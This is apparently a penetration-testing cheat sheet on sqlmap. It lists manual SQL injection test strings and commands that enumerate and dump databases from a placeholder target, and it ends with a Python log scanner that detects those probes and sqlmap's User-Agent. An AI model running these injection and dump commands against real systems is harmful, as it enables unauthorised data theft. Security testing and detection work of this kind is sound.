SQLmap Usage
normal manual testing
flags:
' or 1=1;--
"
sqlmap automate
::: normal database discovery
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" --forms --dbs --batch
::: database discovery
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" --forms -D [databasename] -a --batch
::: table discovery
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" --forms -D [databasename] -a --tables --batch
::: find columns
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" -D [databasename] -T [tablename] --columns --batch
::: dump the table
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" -D [databasename] -T [tablename] --dump --batch
::: dump database
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" -D [databasename] --dump-all --batch
::: database cookie attempt
# sqlmap -u "http://offsecvault/log4j.php?log4j=1" --cookie="value" --dbs
flags:
-u = URL
--all or -a = retrieve everything
--forms = parse and test forms on target URL
--dbs = enumerate DBMS databases
--batch = never ask for user input, default behavior selected
-D = DBMS database to enumerate
-T = DBMS database table(s) to enumerate
-C = DBMS database table column(s) to enumerate
--tables =
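
::: detection side (added example, not part of the original cheat sheet)
A scan of web access logs for the traces the steps above leave behind: the manual test strings in a query parameter and sqlmap's default "sqlmap/<version>" User-Agent. The log lines and the names classify and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined-log-format lines, constructed for this example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /log4j.php?log4j=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /log4j.php?log4j=%27%20or%201%3D1%3B-- HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /log4j.php?log4j=%22 HTTP/1.1" 500 87 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "POST /log4j.php HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
]

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
# A quote followed by "or <n>=<n>", e.g. the manual test string ' or 1=1;--
TAUTOLOGY_RE = re.compile(r"""['"]\s*or\s+\d+\s*=\s*\d+""", re.IGNORECASE)


def classify(line):
    """Return (client, target, reasons) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target, agent = m.groups()
    reasons = []
    # Default sqlmap requests identify themselves. The header is client-controlled,
    # so this is a cheap signal, not proof that no scanner was used.
    if agent.lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    # parse_qsl percent-decodes values, so %27 is checked as a literal quote.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if TAUTOLOGY_RE.search(value) or value.strip() in ("'", '"'):
            reasons.append("sqli-probe:" + name)
    return (client, target, reasons) if reasons else None


def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for client, target, reasons in scan(SAMPLE_LOG):
        print(client, target, ",".join(reasons))
```

Form submissions tested with --forms travel in the POST body, which a standard access log does not record, so only the User-Agent check applies to those requests.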